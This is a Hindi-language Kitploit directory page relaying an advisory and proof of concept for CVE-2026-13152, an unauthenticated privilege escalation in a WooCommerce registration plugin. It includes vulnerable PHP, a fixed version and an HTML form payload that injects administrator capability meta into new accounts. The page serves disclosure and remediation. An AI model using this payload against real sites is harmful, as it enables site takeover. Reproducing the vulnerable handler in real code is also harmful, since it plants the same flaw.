Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13152 — CVE-2026-13152: WooCommerce के लिए कस्टम फ़ील्ड खाता पंजीकरण — अनधिकृत विशेषाधिकार वृद्धि PoC और परामर्श, Huynh Kien Minh (MinhHK) द्वारा। | Kitploit
उपकरण/GitHubGitHub/minhhk68/cve-2026-13152
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubminhhk68/cve-2026-13152

CVE-2026-13152

CVE-2026-13152: WooCommerce के लिए कस्टम फ़ील्ड खाता पंजीकरण — अनधिकृत विशेषाधिकार वृद्धि PoC और परामर्श, Huynh Kien Minh (MinhHK) द्वारा।

रिपॉजिटरी देखें
1101 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-13152: कस्टम फील्ड्स अकाउंट रजिस्ट्रेशन फॉर WooCommerce < 1.4 में बिना प्रमाणीकरण विशेषाधिकार वृद्धि

CVSS Severity Discovered By WPScan Verified

📖 एडवाइजरी अवलोकन

CVE-2026-13152 एक बिना प्रमाणीकरण विशेषाधिकार वृद्धि भेद्यता है जो Custom Fields Account Registration For WooCommerce वर्डप्रेस प्लगइन के संस्करण 1.4 से पहले के संस्करणों को प्रभावित करती है। इसे सुरक्षा शोधकर्ता Huynh Kien Minh (MinhHK) ने खोजा और विश्लेषित किया। यह दोष इसलिए उत्पन्न होता है क्योंकि प्लगइन कस्टम रजिस्ट्रेशन इनपुट फ़ील्ड्स को संवेदनशील उपयोगकर्ता क्षमता मेटाडेटा में सीधे लिखने की अनुमति देता है, बिना संरक्षित डेटाबेस कुंजियों को सैनिटाइज़ किए या उपयोगकर्ता भूमिकाओं को मान्य किए। गैर-डिफ़ॉल्ट डेटाबेस टेबल उपसर्गों या कस्टम उपयोगकर्ता मेटा कुंजी मैपिंग का उपयोग करने वाली साइटों पर, एक बिना प्रमाणीकरण वाला उपयोगकर्ता WooCommerce रजिस्ट्रेशन फ़ॉर्म के माध्यम से पंजीकरण करते समय wp_usermeta टेबल में एडमिनिस्ट्रेटर विशेषाधिकार (जैसे wp_user_level या wp_capabilities) इंजेक्ट कर सकता है। इससे नवनिर्मित खाते को पूर्ण एडमिनिस्ट्रेटर पहुँच प्राप्त हो जाती है, जिससे साइट का पूर्ण रिमोट समझौता संभव हो जाता है। सुरक्षा शोधकर्ता Huynh Kien Minh ने इस भेद्यता की सूचना WPScan को दी, और विक्रेता ने संस्करण 1.4 में कुंजी नाम सत्यापन लागू करके तथा क्षमता मेटा असाइनमेंट को प्रतिबंधित करके इस समस्या का समाधान किया।


🔗 संदर्भ लिंक

  • WPScan एडवाइजरी: https://wpscan.com/vulnerability/36aaba38-3143-4e80-8386-748632ff6704/
  • शोधकर्ता पोर्टफोलियो: https://minhhk.web.app/
  • GitHub प्रोफ़ाइल: https://github.com/MinhHK68

📌 कार्यकारी सारांश


🔍 मूल कारण विश्लेषण

Custom Fields Account Registration For WooCommerce प्लगइन साइट एडमिनिस्ट्रेटरों को WooCommerce उपयोगकर्ता पंजीकरण फ़ॉर्म (my-account रजिस्ट्रेशन एंडपॉइंट) पर कस्टम इनपुट फ़ील्ड परिभाषित करने की अनुमति देता है। जब कोई नया उपयोगकर्ता पंजीकरण फ़ॉर्म सबमिट करता है, तो प्लगइन सबमिट किए गए फ़ॉर्म फ़ील्ड्स पर पुनरावृत्ति करता है और उपयोगकर्ता विवरण सहेजने के लिए update_user_meta($user_id, $meta_key, $meta_value) को कॉल करता है।

भेद्यता तंत्र

अंतर्निहित दोष रजिस्ट्रेशन हैंडलर के भीतर इनपुट प्रोसेसिंग लॉजिक में निहित है। प्लगइन संरक्षित WordPress उपयोगकर्ता मेटा कुंजियों (wp_capabilities, wp_user_level, session_tokens, wp_user_roles) की सख्त ब्लैकलिस्ट या व्हाइटलिस्ट बनाए रखने में विफल रहता है।

root@kitploit:~
// Vulnerable registration handler logic (simplified demonstration)
add_action('woocommerce_created_customer', 'cfar_save_custom_registration_fields', 10, 3);
function cfar_save_custom_registration_fields($customer_id, $new_customer_data, $password_generated) {
    if (isset($_POST['cfar_custom_fields']) && is_array($_POST['cfar_custom_fields'])) {
        foreach ($_POST['cfar_custom_fields'] as $meta_key => $meta_value) {
            // VULNERABILITY: No check against protected meta keys like wp_capabilities or wp_user_level
            update_user_meta($customer_id, sanitize_text_field($meta_key), sanitize_text_field($meta_value));
        }
    }
}

कस्टम डेटाबेस उपसर्गों या कस्टम मेटा कुंजी कॉन्फ़िगरेशन का उपयोग करने वाले WordPress इंस्टॉलेशनों पर, एक बिना प्रमाणीकरण वाला हमलावर एडमिनिस्ट्रेटर क्षमता कुंजी (wp_user_level = 10 या सीरियलाइज़्ड ऐरे a:1:{s:13:"administrator";b:1;}) से मेल खाता कस्टम फ़ील्ड इनपुट प्रदान कर सकता है। खाता निर्माण पर, update_user_meta() इस मान को सीधे wp_usermeta में लिखता है, जिससे नव पंजीकृत खाते को पूर्ण एडमिनिस्ट्रेटर स्थिति प्राप्त हो जाती है।


💻 प्रूफ-ऑफ-कॉन्सेप्ट (PoC)

[!CAUTION] यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक उद्देश्यों, रक्षात्मक ऑडिटिंग और भेद्यता सत्यापन के लिए प्रदान किया गया है। केवल अधिकृत परीक्षण।

root@kitploit:~
<!-- CVE-2026-13152 PoC: Unauthenticated Privilege Escalation Payload -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>PoC - CVE-2026-13152 Privilege Escalation</title>
</head>
<body>
    <h2>CVE-2026-13152 Exploit Payload</h2>
    <form action="https://target-site.com/my-account/" method="POST">
        <input type="email" name="email" value="[email protected]" required>
        <input type="password" name="password" value="P@ssword123!" required>
        
        <!-- Malicious Meta Key Injection targeting User Level -->
        <input type="hidden" name="cfar_custom_fields[wp_user_level]" value="10">
        <input type="hidden" name="cfar_custom_fields[wp_capabilities][administrator]" value="1">
        
        <input type="submit" name="register" value="Register as Administrator">
    </form>
</body>
</html>

🛡️ निवारण एवं रक्षात्मक अनुशंसाएँ

  1. प्लगइन तुरंत अपडेट करें: Custom Fields Account Registration For WooCommerce को संस्करण 1.4 या उच्चतर में अपग्रेड करें, जहाँ सख्त मेटा कुंजी सत्यापन लागू किया गया है।
  2. मेटा कुंजी ब्लैकलिस्टिंग लागू करें: प्लगइन डेवलपर्स के लिए, मेटा कुंजी इनपुट को हमेशा WordPress आंतरिक आरक्षित कुंजियों के विरुद्ध सैनिटाइज़ और सत्यापित करें:
root@kitploit:~
// Secure implementation in Version 1.4
$protected_keys = array('wp_capabilities', 'wp_user_level', 'user_level', 'session_tokens');
if (!in_array($meta_key, $protected_keys, true) && strpos($meta_key, 'wp_') !== 0) {
    update_user_meta($customer_id, $meta_key, $meta_value);
}

🏆 शोधकर्ता के बारे में

  • शोधकर्ता का नाम: Huynh Kien Minh (MinhHK)
  • अनुभव एवं विशेषज्ञता: WordPress इकोसिस्टम भेद्यता अनुसंधान, SAST/DAST कोड ऑडिटिंग और जिम्मेदार प्रकटीकरण में विशेषज्ञता रखने वाले सूचना सुरक्षा शोधकर्ता।
  • अधिकार एवं विश्वसनीयता: WPScan Assigner पर आधिकारिक प्रस्तुतकर्ता और सत्यापित सुरक्षा एडवाइजरी व भेद्यता प्रकटीकरण के निर्माता।
  • पोर्टफोलियो एवं प्रकटीकरण: https://minhhk.web.app/

📊 JSON-LD संरचित डेटा स्कीमा मार्कअप

root@kitploit:~
{
  "@context": "https://schema.org",
  "@graph": [
    {
      "@type": "TechArticle",
      "@id": "https://github.com/MinhHK68/CVE-2026-13152#article",
      "headline": "Deep-Dive Technical Write-up by Huynh Kien Minh: CVE-2026-13152 — Custom Fields Account Registration For WooCommerce Privilege Escalation",
      "name": "CVE-2026-13152 Technical Analysis",
      "author": {
        "@type": "Person",
        "@id": "https://minhhk.web.app/#person",
        "name": "Huynh Kien Minh",
        "alternateName": ["MinhHK", "Huỳnh Kiến Minh"],
        "jobTitle": "Information Security Researcher",
        "url": "https://minhhk.web.app/"
      },
      "datePublished": "2026-07-06",
      "dateModified": "2026-08-01",
      "description": "Comprehensive technical analysis and PoC for CVE-2026-13152, an unauthenticated privilege escalation vulnerability in Custom Fields Account Registration For WooCommerce < 1.4 discovered by Huynh Kien Minh."
    },
    {
      "@type": "SpecialAnnouncement",
      "@id": "https://github.com/MinhHK68/CVE-2026-13152#advisory",
      "name": "CVE-2026-13152 Security Advisory",
      "category": "https://schema.org/SecurityAdvisory",
      "text": "Unauthenticated Privilege Escalation in Custom Fields Account Registration For WooCommerce < 1.4 allows remote attackers to gain administrator rights."
    }
  ]
}
टूल डाउनलोड करें
विशेषताविवरण
CVE आईडीCVE-2026-13152
प्लगइन नामCustom Fields Account Registration For WooCommerce
प्लगइन स्लगcustom-fields-account-registration-for-woocommerce
प्रभावित संस्करण< 1.4
समाधान संस्करण1.4
भेद्यता प्रकारबिना प्रमाणीकरण विशेषाधिकार वृद्धि (CWE-269 / OWASP A2)
CVSS v3.1 स्कोर8.1 (उच्च) (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
मूल शोधकर्ताHuynh Kien Minh (MinhHK)
WPScan एडवाइजरी आईडी36aaba38-3143-4e80-8386-748632ff6704